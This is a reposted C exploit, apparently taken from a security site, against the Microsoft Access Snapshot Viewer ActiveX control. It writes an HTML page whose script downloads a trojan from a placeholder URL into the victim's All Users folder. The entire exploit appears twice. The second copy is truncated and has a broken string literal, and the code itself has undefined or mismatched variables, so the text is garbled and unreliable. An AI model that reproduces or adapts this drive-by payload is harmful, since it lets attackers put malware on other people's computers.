Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
http://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */ #include
#include
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] = "\n\n"
"<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"<script>\n"; int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\n");
printf("**r00t your enemy .| **"); FILE *File;
char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {
printf("\n fopen() error");
exit(1);
} b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File); printf("\n\n" Filename " has been created.\n");
return 0;
}
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
http://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */ #include
#include
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] = "\n
"<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"<script>\n"; int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\n");
printf("**r00t your enemy .| **"); FILE *File;
char *b0fer; if ( (File = fopen(Filename,"w b")) == NULL ) {
printf("\n fopen() error");
exit(1);
} b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File); printf("\n\n" Filename " has been created.\n");
return 0;
}
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149283.html
